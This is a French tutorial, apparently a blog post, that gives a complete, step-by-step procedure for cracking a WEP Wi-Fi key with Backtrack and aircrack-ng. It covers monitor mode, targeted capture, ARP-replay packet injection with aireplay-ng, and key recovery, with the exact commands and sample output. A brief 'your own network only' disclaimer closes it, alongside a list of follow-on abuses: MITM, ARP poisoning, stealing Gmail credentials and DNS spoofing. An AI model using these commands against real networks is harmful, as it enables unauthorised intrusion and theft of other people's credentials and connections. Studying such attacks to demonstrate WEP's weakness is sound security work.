Vous êtes sur la page 1sur 5

Cracker une cl WEP en moins de 5 minutes

En ce moment en cours on parle de temps autre de scurit sur les rseaux wifi et autre. Or parfois je fais le mec chiant en disant Oui, mais cest pas scuris etc. On me regarde avec des yeux ronds et certains doivent penser Oui bon, la scurit, moins de tomber sur un super hacker, pas trop de risques arrte de nous faire chier! . H bien non justement Je vais vous montrer quel point il est simple de craker une cl WEP sur un rseau sans fils et quil est nul besoin dtre un gnie en informatique la preuve, mme moi jy arrive et je suis tout sauf un gnie Passons la pratique: que faut-il pour cracker une cl WEP? Il faut: - Un PC: un laptop de prfrence - Un bon OS: jutiliserai Backtrack 3, une distribution Linux ddie la scurit - Une bonne carte wifi La premire tape est dinstaller Backtrack sur une cl USB et de la rendre bootable, rien de plus simple: tlcharger Backtrack USB et excuter bootinst.sh (dans BOOT). Ensuite on la colle dans les fesses du laptop, on branche sa carte wifi, on dmarre le portable et on boot sur la cl dans le BIOS. Une fois sous Backtrack on ouvre un terminal et on tape: iwconfig Ce qui doit donner un truc ressemblant a: wlan2 IEEE 802.11bg ESSID: FreeWifi Mode:Managed Frequency:2.412 GHz Access Point: Not-Associated Tx-Power=20 dBm Retry min limit:7 RTS thr:off Fragment thr=2352 B Power Management:off Link Quality:0 Signal level:0 Noise level:0 Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 Tx excessive retries:0 Invalid misc:0 Missed beacon:0 Ce qui nous intresse cest wlan2 qui est notre carte wifi. Maintenant pour couter le trafic il faut passer la carte en mode monitor. Backtrack fourni la suite logicielle aircrack-ng qui le permet (note: sous ubuntu, installer en tapant sudo apt-get install aircrack-ng). Pour passer la carte en mode monitor il suffit dutiliser airmon-ng, pour cela: airmon-ng start wlan2 Ce qui donne un truc du style:

Found 5 processes that could cause trouble. If airodump-ng, aireplay-ng or airtun-ng stops working after a short period of time, you may want to kill (some of) them! PID 3597 3616 3621 3622 4643 Name NetworkManager wpa_supplicant avahi-daemon avahi-daemon dhclient Chipset RTL8187 Driver rtl8187 [phy2]

Interface wlan2

Bref, maintenant que tout est oprationnel on va rentrer dans le vif du sujet! Ensuite nous allons chercher des rseaux wifi utilisant le cryptage WEP, pour cela: airodump-ng encrypt wep wlan2 Cela nous donne:

BSSID: correspond ladresse MAC du routeur (ex: Livebox, Neufbox, etc.) ESSID: cest le nom du rseau (ex: neuf wifi) CH: pour channel, cest le canal.

En dessous: STATION, cest ladresse MAC des PC clients connect la box (BSSID). Ici on voit quil identifie bien des clients mais quil narrive par trouver quelle box (BSSID) ils sont associs. NOTE: les screens du dessus sont sous Ubuntu, alors que les screens qui vont venir sont sous Backtrack. Sous Ubuntu, je navais pas de box associe, mais peu importe. Imaginons donc que vous avez votre BSSID et une STATION connect, vous lancez: airodump-ng -w DATA-NUMERICABLE -c 6 bssid XX:XX:XX:XX:XX:XX wlan2 Explications: -w = crire dans un fichier suivit du nom de fichier (ici DATA-NUMERICABLE) -c = le channel (ici le channel 6) bssid = ladresse mac de la box (BSSID) Cette commande permet de cibler uniquement la connexion wifi voulue et capturer les DATA dans un .cap

Maintenant que la capture est lance, nous allons injecter des paquets pour faire grimper les DATA.Pour ce faire nous allons utiliser aireplay-ng en tapant: aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b XX:XX:XX:XX:XX:XX -h CC:CC:CC:CC:CC:CC wlan2 -c = nimporte quoi, une adresse MAC alatoire -b = le BSSID de la box

- h = ladresse MAC de la station client connect la box Une fois la commande lance, il va se mettre lire des paquets, puis vous proposer den injecter (voir screen). Un bon paquet commence par 0842 !!

Voila une fois que vous approuvez le paquet, linjection commence et les DATA devraient grimper mort! Si vous regardez mon screen prcdent vous remarquerez dans la colonne DATA que je suis dj 87897 ! En fait, jai fait le screen aprs avoir lanc le craquage du .cap (ce que je vais expliquer). Normalement partir de 50000 vous pouvez commencer craquer. Dernire tape: le dcryptage On a donc fait nos capture dans le fichier DATA-NUMERICABLE, nous avons plus qu utiliser aircrack-ng, pour cela ouvrir dans un troisime terminal: aircrack-ng -P2 DATA-NUMERICABLE.cap Ay cest parti et normalement au bout de quelques minutes:

Voila cest fini vous avez votre cl WEP! NOTE: Bien sr vous navez le droit de faire a que sur votre connexion pas sur celle du voisin. Vous me direz, Quel serait lintrt de le faire chez le voisin si ce nest pour lui piquer sa connexion internet? Mais a sert plein de choses!!! Faire des MITM et de lArp Poisonning et piquer ses identifiants Gmail, Spoofer ses DNS, mener des attaques sur le web, etc les utilisations illgales sont multiples, mais cest INTERDIT! (et je suis un brave tudiant en Droit!!